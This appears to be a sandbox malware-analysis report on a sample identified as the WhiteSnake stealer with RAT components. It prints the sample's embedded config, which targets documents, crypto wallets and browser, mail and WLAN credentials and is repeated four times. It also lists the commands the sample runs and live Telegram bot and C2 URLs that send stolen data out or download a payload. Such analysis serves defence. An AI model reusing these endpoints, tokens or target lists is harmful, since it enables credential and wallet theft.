Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Yara detected WhiteSnake Stealer
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Yara detected XenoRAT
Source: Yara match File source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520806 Sample: 0LpFv1haTA.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 105 api.telegram.org 2->105 107 serveo.net 2->107 109 ip-api.com 2->109 121 Suricata IDS alerts for network traffic 2->121 123 Found malware configuration 2->123 125 Antivirus / Scanner detection for submitted sample 2->125 129 16 other signatures 2->129 12 0LpFv1haTA.exe 7 2->12         started        16 0LpFv1haTA.exe 2->16         started        18 0LpFv1haTA.exe 2->18         started        20 4 other processes 2->20 signatures3 127 Uses the Telegram API (likely for C&C communication) 105->127 process4 file5 99 C:\Users\user\AppData\...\0LpFv1haTA.exe, PE32 12->99 dropped 101 C:\Users\...\0LpFv1haTA.exe:Zone.Identifier, ASCII 12->101 dropped 103 C:\Users\user\AppData\...\0LpFv1haTA.exe.log, CSV 12->103 dropped 155 Found many strings related to Crypto-Wallets (likely being stolen) 12->155 157 Self deletion via cmd or bat file 12->157 22 cmd.exe 1 12->22         started        159 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->159 161 Tries to steal Mail credentials (via file / registry access) 16->161 163 Tries to harvest and steal browser information (history, passwords, etc) 16->163 165 Tries to harvest and steal WLAN passwords 16->165 25 cmd.exe 16->25         started        27 WerFault.exe 16->27         started        30 cmd.exe 16->30         started        32 ssh.exe 16->32         started        signatures6 process7 file8 143 Uses schtasks.exe or at.exe to add and modify task schedules 22->143 145 Uses netsh to modify the Windows network and firewall settings 22->145 147 Tries to harvest and steal WLAN passwords 22->147 34 0LpFv1haTA.exe 14 30 22->34         started        39 conhost.exe 22->39         started        41 timeout.exe 1 22->41         started        49 2 other processes 22->49 43 conhost.exe 25->43         started        45 chcp.com 25->45         started        51 2 other processes 25->51 97 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->97 dropped 53 4 other processes 30->53 47 conhost.exe 32->47         started        signatures9 process10 dnsIp11 111 188.120.242.78, 49739, 8817 THEFIRST-ASRU Russian Federation 34->111 113 api.telegram.org 149.154.167.220, 443, 49712, 49713 TELEGRAMRU United Kingdom 34->113 115 7 other IPs or domains 34->115 91 C:\Users\user\AppData\Roaming\manager.exe, PE32 34->91 dropped 131 Antivirus detection for dropped file 34->131 133 Multi AV Scanner detection for dropped file 34->133 135 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->135 137 6 other signatures 34->137 55 manager.exe 34->55         started        59 cmd.exe 34->59         started        61 cmd.exe 34->61         started        63 ssh.exe 34->63         started        file12 signatures13 process14 dnsIp15 95 C:\Users\user\AppData\Roaming\...\manager.exe, PE32 55->95 dropped 149 Multi AV Scanner detection for dropped file 55->149 151 Machine Learning detection for dropped file 55->151 66 manager.exe 55->66         started        153 Tries to harvest and steal WLAN passwords 59->153 71 conhost.exe 59->71         started        73 chcp.com 59->73         started        75 netsh.exe 59->75         started        77 findstr.exe 59->77         started        79 conhost.exe 61->79         started        81 chcp.com 61->81         started        85 2 other processes 61->85 119 serveo.net 138.68.79.95, 22, 49707, 49710 DIGITALOCEAN-ASNUS United States 63->119 83 conhost.exe 63->83         started        file16 signatures17 process18 dnsIp19 117 193.149.187.135, 4444, 49744, 49747 DANISCODK Denmark 66->117 93 C:\Users\user\AppData\Local\...\tmp4A67.tmp, ASCII 66->93 dropped 139 Multi AV Scanner detection for dropped file 66->139 141 Machine Learning detection for dropped file 66->141 87 schtasks.exe 66->87         started        file20 signatures21 process22 process23 89 conhost.exe 87->89         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.120.242.78
 unknown Russian Federation
29182 THEFIRST-ASRU true
185.80.128.17
 unknown Lithuania
61053 VPSNET-ASLT false
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
206.189.109.146
 unknown United States
14061 DIGITALOCEAN-ASNUS true
193.149.187.135
 unknown Denmark
15411 DANISCODK true
167.99.138.249
 unknown United States
14061 DIGITALOCEAN-ASNUS true
185.253.7.60
 unknown Russian Federation
206352 MEDIACONNECTIVEGB true
45.82.65.63
 unknown United Kingdom
208862 SIRINFO-ASIT true
138.68.79.95
 serveo.net United States
14061 DIGITALOCEAN-ASNUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
serveo.net 138.68.79.95 true
ip-api.com 208.95.112.1 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML true
    		unknown
    http://ip-api.com/line?fields=query,country false
      		unknown
      https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML true
        		unknown
        http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== true
          		unknown
          http://185.253.7.60:8080//mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE true
            		unknown
            http://185.80.128.17/manager.exe false
              		unknown
              https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML true
                		unknown
                193.149.187.135 true
                  		unknown